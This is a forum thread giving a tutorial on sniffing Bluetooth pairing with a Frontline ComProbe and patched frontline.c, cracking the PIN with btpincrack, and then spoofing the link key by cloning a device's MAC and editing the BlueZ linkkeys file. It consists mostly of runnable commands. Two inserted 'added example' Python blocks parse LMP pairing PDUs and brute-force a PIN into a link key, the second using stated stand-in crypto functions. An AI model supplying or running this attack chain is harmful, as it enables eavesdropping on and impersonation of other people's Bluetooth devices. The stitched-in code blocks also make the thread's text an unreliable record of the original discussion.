Hey guys
Been messing around with a few things and decided to make this little tutorial in the process.
Enjoy ;D
Blip.tv link: http://blip.tv/file/952892/
YouTube link: http://www.youtube.com/watch?v=r8QLAnmZZ2E
Nice one doc...maybe a write up would be good too
dd if=/dev/swc666 of=/dev/wyze
Ok, here's the write-up on my video.

Ok, to set up this attack you will need the following...
one or two Bluetooth enabled devices
Frontline ComProbe
A regular Bluetooth device (for getting MACs)
a copy of frontline.c
openciphers btpincrack

First thing is to set up your lab. Let's get the Bluetooth hardware and services started.
Code:
hciconfig hci0 up
hciconfig hci1 up
bash /etc/rc.d/rc.bluetooth start

You can check everything is running correctly by issuing the hciconfig command.
Code:
hciconfig

Ok, now we are ready to set up frontline.c.

Now I have had some trouble with the frontline source code and my Frontline ComProbe. I am using the airsniffer47-bc04 and it seems the packet shift is double that set in frontline.c ???
I'm keen to find out what's going on and have asked the powers that be to look into this, and they have asked me to try a couple of things. One suggestion is to change FP_TYPE_SHIFT to 2, but it still has the same results. For now you will have to check it out for yourself, but if possible could somebody please try frontline.c with a D-Link DBT-120 without my mod and post the log?

OK, open frontline.c in your fav editor and find the following...
Code:
#define TYPE_DV 8
#define LMP_IN_RAND 8
#define LMP_COMB_KEY 9
#define LMP_AU_RAND 11
#define LMP_SRES 12

Now change to the following values...
Code:
#define TYPE_DV 16
#define LMP_IN_RAND 16
#define LMP_COMB_KEY 18
#define LMP_AU_RAND 22
#define LMP_SRES 24

Save and exit, then compile with the following command...
Code:
gcc frontline.c -o frontline -lbluetooth

That's frontline.c patched, now we can start the sniffer.
Ok, if you run frontline with the -h tag you will see what options you have to play with. As explained in the video, to start the sniffing process you will need the master's and slave's MACs first. At the moment there is no way of telling who is the master or slave in a piconet; obviously you would know this info because this is your equipment we are using, right??? ! lol. But in a real situation it would just be trial and error and maybe a bit of an educated guess.

Ok, let's scan for devices; if you already know the MACs skip this step.
Code:
hcitool inq

Good practice to always issue a stop to your sniffer before starting, just in case.
Code:
frontline -d hci1 -s

Next we tell the ComProbe to filter all frames.
Code:
frontline -d hci1 -f 7

Next we add our MACs.
Code:
frontline -d hci1 -S MA:ST:ER:MA:C1@SL:AV:EM:AC:01

Now let's start the sniffing process. -p tells frontline to look for a key exchange and -z tells frontline to ignore zero-length packets, or in my language crap.
Code:
frontline -d hci1 -p -z -e

Now pair the two devices and you should see some data. Once the pairing process is complete, stop frontline and check back for the pairing process as seen in the video.

Next compile btpincrack. I can't remember if you need to do anything to install onto BT3, so if you get errors post 'em and I'll fix 'em for you lol.

And run frontline's output through btpincrack as seen in the video. A 6-digit PIN should take around 7 seconds.

And you're done!
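Added example, not code from frontline.c or btpincrack, to show what the LMP opcode constants in the #defines above mean on the wire. Per the Bluetooth Core spec the first payload byte of an LMP PDU carries the 7-bit opcode in bits 1..7 and the transaction ID in bit 0, so LMP_in_rand (opcode 8) arrives as 0x10 with TID 0 or 0x11 with TID 1; with TID 0 the raw bytes for the four pairing PDUs are 16, 18, 22 and 24, which is exactly the doubling seen in the patched values. A decoder that splits the byte instead of comparing it whole catches both TID values. The sample PDUs and the master/slave labels are constructed for the example.

```python
# Added example, not code from frontline.c or btpincrack.  Sample PDUs are constructed.

# Opcodes from the Bluetooth Core spec (the values in the unpatched #defines).
LMP_ACCEPTED, LMP_IN_RAND, LMP_COMB_KEY, LMP_AU_RAND, LMP_SRES = 3, 8, 9, 11, 12

# Pairing PDUs a PIN attack needs, with their fixed parameter lengths in bytes.
PAIRING_PDUS = {
    LMP_IN_RAND: ("LMP_in_rand", 16),
    LMP_COMB_KEY: ("LMP_comb_key", 16),
    LMP_AU_RAND: ("LMP_au_rand", 16),
    LMP_SRES: ("LMP_sres", 4),
}


def split_lmp_header(first_byte):
    """First payload byte of an LMP PDU: 7-bit opcode in bits 1..7, transaction ID in bit 0.
    Opcode 8 (LMP_in_rand) therefore appears as 0x10 with TID 0 or 0x11 with TID 1."""
    return first_byte >> 1, first_byte & 1


def parse_lmp_pdu(pdu):
    """Return (opcode, tid, params); reject pairing PDUs whose parameter length is wrong."""
    if not pdu:
        raise ValueError("empty LMP PDU")
    opcode, tid = split_lmp_header(pdu[0])
    params = bytes(pdu[1:])
    if opcode in PAIRING_PDUS:
        name, expected = PAIRING_PDUS[opcode]
        if len(params) != expected:
            raise ValueError(f"{name}: expected {expected} parameter bytes, got {len(params)}")
    return opcode, tid, params


def collect_pairing_material(frames):
    """frames: iterable of (sender, pdu_bytes) with sender 'master' or 'slave'.
    Returns {(pdu_name, sender): params} for the pairing PDUs, skipping everything else."""
    material = {}
    for sender, pdu in frames:
        opcode, _tid, params = parse_lmp_pdu(pdu)
        if opcode in PAIRING_PDUS:
            material[(PAIRING_PDUS[opcode][0], sender)] = params
    return material


def is_complete(material):
    """Minimum set for a PIN attack on a master-initiated combination-key pairing."""
    needed = [("LMP_in_rand", "master"), ("LMP_comb_key", "master"),
              ("LMP_comb_key", "slave"), ("LMP_au_rand", "master"), ("LMP_sres", "slave")]
    return all(key in material for key in needed)


# Constructed sample exchange.  With TID 0 the raw first bytes are 0x10, 0x12, 0x16, 0x18,
# i.e. the doubled values 16, 18, 22, 24.
SAMPLE_FRAMES = [
    ("master", bytes([0x10]) + bytes(range(16))),       # LMP_in_rand
    ("slave",  bytes([0x06, 0x08])),                    # LMP_accepted (opcode 3), ignored
    ("master", bytes([0x12]) + bytes([0xAA] * 16)),     # LMP_comb_key from master
    ("slave",  bytes([0x12]) + bytes([0xBB] * 16)),     # LMP_comb_key from slave
    ("master", bytes([0x16]) + bytes([0xCC] * 16)),     # LMP_au_rand, master challenges slave
    ("slave",  bytes([0x18, 0x01, 0x02, 0x03, 0x04])),  # LMP_sres, 4-byte response
]

if __name__ == "__main__":
    found = collect_pairing_material(SAMPLE_FRAMES)
    for (name, sender), params in found.items():
        print(f"{sender:6} {name:13} {params.hex()}")
    print("complete pairing exchange:", is_complete(found))
```

A real sniffer log also carries the ComProbe's own framing in front of each LMP payload; this example starts at the LMP payload byte and says nothing about that framing, which is where the packet-shift question in the post actually lives.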
Nice tutorial Doc, I'm still awaiting enough money to invest in a RAM Bluetooth device with SMA connection. You seriously love your Bluetooth hacking, it's really interesting. Can't wait until the day that I have the correct Bluetooth adapter.
Out of interest, what adapters are you using? What firmware are you using for them?
Again, great tutorial. I like reading your work, gotta love that 'one to rule them all' thread...
... EDIT: Wow, fast reply. I had this window open whilst watching your vid. Looks like you already included the information I was talking about.
You're a good man Doc...
dd if=/dev/swc666 of=/dev/wyze
Thanks guys, I'm using a Fujitsu-Siemens Bluetooth v2.0.
EDIT:
If you would like to then use the link key to connect to the device, first you would clone the MAC of the desired device. Then you need to change your device class and name to the same as the desired device. Next you need to add your link key to BT. Go to /var/lib/bluetooth/LO:CA:LM:AC:AD (replace with your device's MAC), open linkkeys and add the following.
Code:
CL:ON:ED:MA:C linkkeydatalinkkeydatalinkkeydatalinkkeydata 0*1 6*2
*1 First channel available
*2 Last channel available
Save and you are good to go. This stuff is very naughty so please DO NOT USE ILLEGALLY !!! I've sorta left bits out on purpose lol. I will be adding all this stuff to Blue|Smash over the next day or two. After spoofing the link key anything is possible providing the spoofed device has clearance ;D
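Added example, not btpincrack's code and not anything from the posts above, serving two points in this thread: why a 6-digit PIN falls in seconds once the pairing PDUs are sniffed, and what then goes into the linkkeys line. The data flow is the Bluetooth combination-key pairing: Kinit from the PIN and IN_RAND, each side's LK_RAND recovered as COMB_KEY xor Kinit, the link key as the xor of the two E21 outputs, and the sniffed SRES used as the oracle for each PIN guess. The E22/E21/E1 functions themselves are HMAC-SHA256 stand-ins (an assumption, stated in the code) for the SAFER+-based originals, so the numbers are not interoperable with a real capture; the search is structurally the same. The "capture" is constructed with those same stand-ins, and the addresses are made up. The two trailing fields of the linkkeys line are treated here the way BlueZ 3 writes them, key type (0 = combination key) and PIN length.

```python
import hashlib
import hmac
import itertools

# Added example, not btpincrack's code.  E22/E21/E1 below are HMAC-SHA256 STAND-INS
# (assumption) for the SAFER+-based Bluetooth functions; the pairing data flow is real.


def _prf(label, n, *parts):
    return hmac.new(label, b"".join(parts), hashlib.sha256).digest()[:n]


def e22(pin, bd_addr, in_rand):
    """Stand-in for E22: initialization key Kinit from PIN, BD_ADDR and IN_RAND."""
    return _prf(b"E22", 16, pin, bd_addr, in_rand)


def e21(lk_rand, bd_addr):
    """Stand-in for E21: per-device key LK_K from LK_RAND and that device's BD_ADDR."""
    return _prf(b"E21", 16, lk_rand, bd_addr)


def e1(link_key, au_rand, bd_addr):
    """Stand-in for E1: 32-bit SRES from link key, AU_RAND and the claimant's BD_ADDR."""
    return _prf(b"E1", 4, link_key, au_rand, bd_addr)


def xor16(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def bdaddr(text):
    return bytes.fromhex(text.replace(":", ""))


def derive_link_key(pin, addr_a, addr_b, in_rand, comb_a, comb_b):
    """A (master) sent IN_RAND; each side then sent COMB_KEY = its LK_RAND xor Kinit.
    This example feeds B's address to E22 (master-initiated case)."""
    kinit = e22(pin, addr_b, in_rand)
    lk_k_a = e21(xor16(comb_a, kinit), addr_a)
    lk_k_b = e21(xor16(comb_b, kinit), addr_b)
    return xor16(lk_k_a, lk_k_b)


def crack_pin(cap, max_digits):
    """Try every PIN of 1..max_digits digits; the sniffed SRES is the oracle.
    Returns (pin, link_key) or (None, None)."""
    for n in range(1, max_digits + 1):
        for digits in itertools.product("0123456789", repeat=n):
            pin = "".join(digits).encode()
            kab = derive_link_key(pin, cap["addr_a"], cap["addr_b"],
                                  cap["in_rand"], cap["comb_a"], cap["comb_b"])
            if e1(kab, cap["au_rand"], cap["addr_b"]) == cap["sres"]:
                return pin.decode(), kab
    return None, None


def linkkeys_line(remote_addr, link_key, key_type=0, pin_len=4):
    """One entry of the BlueZ 3 /var/lib/bluetooth/<local>/linkkeys file:
    remote address, 32 hex chars of key, key type (0 = combination key), PIN length."""
    if len(link_key) != 16:
        raise ValueError("link key must be 16 bytes")
    return f"{remote_addr} {link_key.hex().upper()} {key_type} {pin_len}"


def make_capture(pin, addr_a="00:11:22:33:44:55", addr_b="66:77:88:99:AA:BB"):
    """Constructed sample 'sniff' built with the stand-in functions (not a real capture).
    Returns (capture, true_link_key) so a cracked key can be checked."""
    a, b = bdaddr(addr_a), bdaddr(addr_b)
    in_rand, lk_rand_a, lk_rand_b = bytes(range(16)), bytes([0xA5] * 16), bytes([0x5A] * 16)
    kinit = e22(pin, b, in_rand)
    kab = xor16(e21(lk_rand_a, a), e21(lk_rand_b, b))
    au_rand = bytes([0x3C] * 16)
    cap = {"addr_a": a, "addr_b": b, "in_rand": in_rand,
           "comb_a": xor16(lk_rand_a, kinit), "comb_b": xor16(lk_rand_b, kinit),
           "au_rand": au_rand, "sres": e1(kab, au_rand, b)}
    return cap, kab


if __name__ == "__main__":
    cap, real_kab = make_capture(b"0042")
    pin, kab = crack_pin(cap, 4)
    print("PIN:", pin, "link key matches:", kab == real_kab)
    print(linkkeys_line("66:77:88:99:AA:BB", kab, pin_len=len(pin)))
```

The cost is one key derivation plus one SRES check per candidate, which is why the search scales with 10^digits and nothing in the protocol slows it down; a 4-digit space is exhausted in a fraction of a second even in Python with these stand-ins.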
Now I receive this error when trying to connect:
Cannot open '/dev/rfcomm0': No route to host
I'm assuming this is due to cloning everything and the phone is getting mixed up due to a previous connection, and I can't delete the Bluetooth entry unless I restore to default settings, which is not something I want to do. I'm also guessing this is the part you left out?
akamagic, explain more?
Ok, let me go back a bit. First of all, I'm having problems getting frontline to capture anything other than the unknown type:1 and type:4 caused by starting the devices. I followed everything in the write-up, including patching frontline, and also without. In the video you use hcidump, which clearly shows the process of my connection. So either frontline is my problem or it's my dongle. I have a DBT-120 C1 running up raw and so am almost positive it is in fact a sniffer.
Code:
hci1: Type: USB
BD Address: 00:1C:F0:EE:AAF ACL MTU: 0:0 SCO MTU: 0:0
Sniff 47 (2006-02-15)
Chip version: BlueCore4-External
Max key size: 128 bit
SCO mapping: HCI
Any suggestions would be appreciated.
Hey akamagic
What are you trying to sniff? I've also had problems like this when two devices change roles. Also, distance is a big issue too; I would recommend you sniff only a foot away from the master.
If you still get stuck, post what you are trying to achieve, including the equipment used.